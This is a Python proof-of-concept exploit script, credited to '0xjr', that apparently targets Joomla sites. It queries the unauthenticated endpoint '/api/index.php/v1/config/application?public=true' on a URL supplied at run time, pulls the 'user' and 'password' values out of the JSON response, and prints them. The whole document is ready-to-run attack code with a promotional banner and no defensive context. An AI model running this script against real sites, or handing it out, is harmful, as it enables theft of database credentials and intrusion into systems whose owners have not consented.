#!/usr/bin/python3 # usage: python3 exploit.py http:// # 0xjr: join the discord, link in github bio import requests import sys from colorama import Fore, init import json from urllib.parse import urljoin init(autoreset=True) # banner banner = """ __ __ __ / /___ ____ ____ ___ / /___ _/ / __ / / __ \/ __ \/ __ `__ \/ / __ `/ / / /_/ / /_/ / /_/ / / / / / / / /_/ /_/ \____/\____/\____/_/ /_/ /_/_/\__,_(_) PoC By: 0xjr Join the discord! Link in my github bio! """ print(f"{Fore.BLUE}{banner}") def get_url(base_url): try: api_path = "/api/index.php/v1/config/application?public=true" url = urljoin(base_url, api_path) print(f"{Fore.BLUE}[~] Info: Trying, {url}.") response = requests.get(url) response.raise_for_status() data = response.json() def find_keys(node, keys): if isinstance(node, dict): for k, v in node.items(): if k in keys: keys[k] = v if isinstance(v, (dict, list)): find_keys(v, keys) elif isinstance(node, list): for item in node: find_keys(item, keys) keys = {"user": None, "password": None} find_keys(data, keys) if keys["user"] and keys["password"]: print(f"{Fore.GREEN}[+] Success: Found username: {keys['user']}") print(f"{Fore.GREEN}[+] Success: Found password: {keys['password']}") else: print(f"{Fore.YELLOW}[!] Warning: Sensitive information not found in the response.") except requests.ConnectionError as e: print(f"{Fore.RED}[-] Error: {e}") except requests.HTTPError as e: print(f"{Fore.RED}[-] HTTP Error: {e}") except json.JSONDecodeError as e: print(f"{Fore.RED}[-] JSON Decode Error: {e}") except Exception as e: print(f"{Fore.RED}[-] An unexpected error occurred: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print(f"{Fore.RED}[-] Usage: python3 {sys.argv[0]} http://") sys.exit(1) base_url = sys.argv[1] get_url(base_url)